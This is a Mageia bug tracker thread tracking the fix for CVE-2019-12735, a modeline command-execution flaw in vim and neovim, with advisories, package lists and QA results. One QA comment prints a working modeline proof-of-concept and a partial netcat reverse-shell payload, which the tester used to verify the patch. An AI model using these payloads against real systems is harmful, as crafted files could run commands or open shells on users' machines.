A security issue fixed upstream in vim and neovim has been announced: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md The issue is fixed upstream in vim 8.1.1365 and neovim 0.3.6. Mageia 6 and Mageia 7 are also affected.
Whiteboard: (none) => MGA7TOO, MGA6TOO
Assigning to the neovim maintainer, because he might have more time than the vim maintainer. CC'ing the vim maintainer.
CC: (none) => marja11, thierry.vignaudAssignee: bugsquad => smelror
Neovim 0.3.7 pushed to updates_testing
RedHat has issued an advisory for vim on June 26: https://access.redhat.com/errata/RHSA-2019:1619
Advisory ======== Neovim has been updated to fix a security issue. CVE-2019-12735: getchar.c in Neovim before 0.3.6 allows remote attackers to execute arbitrary OS commands via the :source! command in a modeline, as demonstrated by assert_fails or nvim_input in Neovim. References ========== https://nvd.nist.gov/vuln/detail/CVE-2019-12735 Files ===== Uploaded to core/updates_testing neovim-0.3.7-1.mga7 neovim-data-0.3.7-1.mga7 from neovim-0.3.7-1.mga7.src.rpm
Assignee: smelror => qa-bugs
vim needs to be fixed too.
Version: Cauldron => 7Whiteboard: MGA7TOO, MGA6TOO => MGA6TOOAssignee: qa-bugs => thierry.vignaudCC: (none) => qa-bugs, smelror
Debian has issued an advisory for this on June 13: https://www.debian.org/security/2019/dsa-4467 Ubuntu has issued advisories for this on June 11: https://usn.ubuntu.com/4016-1/ https://usn.ubuntu.com/4016-2/
Severity: normal => major
Debian has issued an advisory for this on July 23: https://www.debian.org/security/2019/dsa-4487
Fedora has issued an advisory for vim on June 6: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2BMDSHTF754TITC6AQJPCS5IRIDMMIM7/ We are still missing a vim update for Mageia 7. Someone please take care of it.
CC: (none) => pkg-bugs
Status comment: (none) => neovim has been updated, vim update still needed
Patched package uploaded for Mageia 7. Advisory: ======================== Updated vim package fixes security vulnerabilities: It was discovered that Vim before 8.1.1365 and Neovim before 0.3.6 did not restrict the `:source!` command when executed in a sandbox. This allows remote attackers to take advantage of the modeline feature to inject arbitrary commands when a specially crafted file is opened (CVE-2019-12735). References: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2BMDSHTF754TITC6AQJPCS5IRIDMMIM7/ https://nvd.nist.gov/vuln/detail/CVE-2019-12735 ======================== Updated packages in core/updates_testing: ======================== vim-common-8.1.1048-1.1.mga7.x86_64.rpm vim-enhanced-8.1.1048-1.1.mga7.x86_64.rpm vim-minimal-8.1.1048-1.1.mga7.x86_64.rpm vim-X11-8.1.1048-1.1.mga7.x86_64.rpm from vim-8.1.1048-1.1.mga7.src.rpm
Whiteboard: MGA6TOO => (none)CC: (none) => mramboAssignee: thierry.vignaud => qa-bugs
Thanks. We'll need to clarify in the advisory that this update includes both vim and neovim.
Status comment: neovim has been updated, vim update still needed => (none)
mga7, x86_64 $ rpm -qa | grep neovim neovim-0.3.5-1.mga7 neovim-data-0.3.5-1.mga7 nodejs-neovim-4.5.0-1.mga7 CVE-2019-12735 https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md Two PoC available. $ cat poc.txt :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" $ cat shell.txt \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 999! *Before update* This test demonstrates the vulnerability. $ nvim poc.txt <This executes the 'uname -a' command> Linux canopus 5.1.14-desktop-1.mga7 #1 SMP Sat Jun 22 10:35:14 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux Press ENTER or type command to continue :q $ nvim shell.txt This starts a normal vi session without the reverse terminal and system call. $ grep nomodelines /usr/share/vim/vimrc returns nothing. nomodelines is supposed to prevent the use of custom modelines in files to be edited by vim. So in the default configuration file that protection is not there. However, the exploit is not delivered either, which implies that the vulnerability has already been patched. *After update* - neovim-0.3.7-1.mga7.x86_64 - neovim-data-0.3.7-1.mga7.noarch - vim-common-8.1.1048-1.1.mga7.x86_64 - vim-enhanced-8.1.1048-1.1.mga7.x86_64 - vim-minimal-8.1.1048-1.1.mga7.x86_64 - vim-X11-8.1.1048-1.1.mga7.x86_64 $ nvim shell.txt Normal session, as before. $ nvim poc.txt Normal session, so the problem has been fixed. For good measure, running these two tests with the vim, vi variants returned the same results. Finished off this report using nvim. *vim looks OK.
CC: (none) => tarazed25Whiteboard: (none) => MGA7-64-OK
Validating. Advisory information in Comment 4, Comment 9, and Comment 10.
Keywords: (none) => validated_updateCC: (none) => andrewsfarm, sysadmin-bugs
CC: (none) => tmbKeywords: (none) => advisory
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2020-0082.html
Resolution: (none) => FIXEDStatus: NEW => RESOLVED